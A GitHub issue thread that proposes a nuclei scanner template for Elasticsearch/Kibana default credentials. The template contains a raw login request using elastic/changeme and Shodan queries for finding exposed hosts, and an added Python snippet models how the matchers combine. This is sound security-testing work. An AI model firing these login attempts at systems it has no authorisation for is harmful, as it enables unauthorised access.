elasticsearch default credentials #7721

Closed
omranisecurity opened this issue Jul 18, 2023 · 3 comments · Fixed by #7754
omranisecurity commented Jul 18, 2023

Template Information:

Reference:
- https://www.alibabacloud.com/blog/what-is-the-default-username-and-password-for-elasticsearch_599610

Nuclei Template:

```yaml
id: elasticsearch-default-credentials

info:
  name: elasticsearch default credentials
  author: Mohammad Reza Omrani | @omranisecurity
  severity: high
  description: Elasticsearch default credentials were discovered.
  reference: https://www.alibabacloud.com/blog/what-is-the-default-username-and-password-for-elasticsearch_599610
  tags: default-login, default-credentials, elasticsearch, elastic
  metadata:
    shodan-query:
      - http.title:"Elastic"
      - http.favicon.hash:1328449667
    max-request: 5

http:
  - raw:
      - |
        POST /internal/security/login HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows; Windows NT 10.1; Win64; x64; en-US) Gecko/20100101 Firefox/49.5
        Referer: {{BaseURL}}/login
        Content-Type: application/json
        kbn-version: 8.1.2
        x-kbn-context: %7B%22name%22%3A%22security_login%22%2C%22url%22%3A%22%2Flogin%22%7D
        Origin: {{BaseURL}}

        {"providerType":"basic","providerName":"basic","currentURL":"{{BaseURL}}/login","params":{"username":"{{username}}","password":"{{password}}" }}

    payloads:
      username:
        - elastic
      password:
        - changeme
    attack: pitchfork

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'Set-Cookie: sid='
          - 'kbn-license-sig:'

      - type: status
        status:
          - 200
```

Screenshot from 2023-07-20 16-29-12
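
How the matchers in the template above combine, as an added example that is not part of the original issue or of the nuclei project's code: a small Python model of `matchers-condition: and` with a word matcher whose `condition` key is left at nuclei's default (`or`). The helper names and the response samples are constructed for illustration.

```python
# Added example: minimal model of how the template's two matchers combine.
# The response samples below are constructed, not captured from a real server.

WORDS = ["Set-Cookie: sid=", "kbn-license-sig:"]  # words from the template
STATUSES = (200,)                                  # status matcher from the template


def word_matcher(headers: str, words, condition: str = "or") -> bool:
    """Word matcher on the header part; without `condition`, one word is enough."""
    hits = [w in headers for w in words]
    return all(hits) if condition == "and" else any(hits)


def template_matches(status: int, headers: str, word_condition: str = "or") -> bool:
    """matchers-condition: and -> the word matcher AND the status matcher must pass."""
    return word_matcher(headers, WORDS, word_condition) and status in STATUSES


# Constructed samples: (status code, raw response headers)
SAMPLES = {
    "login_ok": (200, "Set-Cookie: sid=CONSTRUCTED; HttpOnly\r\nkbn-license-sig: abc123\r\n"),
    "login_failed": (401, "kbn-license-sig: abc123\r\n"),
    "other_200_without_session": (200, "kbn-license-sig: abc123\r\n"),
}


def evaluate(word_condition: str = "or") -> dict:
    """Run every constructed sample through the modelled template."""
    return {
        name: template_matches(status, headers, word_condition)
        for name, (status, headers) in SAMPLES.items()
    }


if __name__ == "__main__":
    for cond in ("or", "and"):
        print(cond, evaluate(cond))
```

Under the default, a 200 response that carries only `kbn-license-sig:` satisfies the template; setting `condition: and` on the word matcher would require the session cookie as well.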

omranisecurity added the nuclei-template label Jul 18, 2023
DhiyaneshGeek self-assigned this Jul 18, 2023
omranisecurity changed the title [nuclei-template] elasticsearch default credentials Jul 18, 2023

omranisecurity commented

@princechaddha
How long does it take to check the template?

DhiyaneshGeek commented

Hi @omranisecurity, I'm looking into this right now, should provide you in a min

Thanks !

DhiyaneshGeek linked a pull request Jul 24, 2023 that will close this issue

DhiyaneshGeek commented

Hi @omranisecurity, I have raised PR #7754. Could you share some information for setting up a vulnerable setup, like Docker or setup instructions?

Thank you 😄

DhiyaneshGeek added the Done label Jul 24, 2023